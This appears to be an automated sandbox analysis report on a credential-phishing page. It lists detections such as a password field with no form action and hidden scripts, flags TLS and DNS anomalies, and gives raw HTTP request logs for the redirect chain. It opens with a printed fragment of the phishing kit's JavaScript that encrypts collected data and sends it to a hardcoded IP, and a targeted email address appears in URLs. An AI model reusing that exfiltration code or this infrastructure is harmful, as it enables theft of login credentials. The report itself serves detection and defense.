'/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',

HTML body contains low number of good links

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML page contains hidden URLs or javascript code

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com

HTML title does not match URL

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Title: Fair Value does not match URL

Invalid T&C link found

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:49712 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:61005 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:62906 -> 162.159.36.2:53

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: global traffic	HTTP traffic detected: GET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1Host: www.itanhangasaude.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.itanhangasaude.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
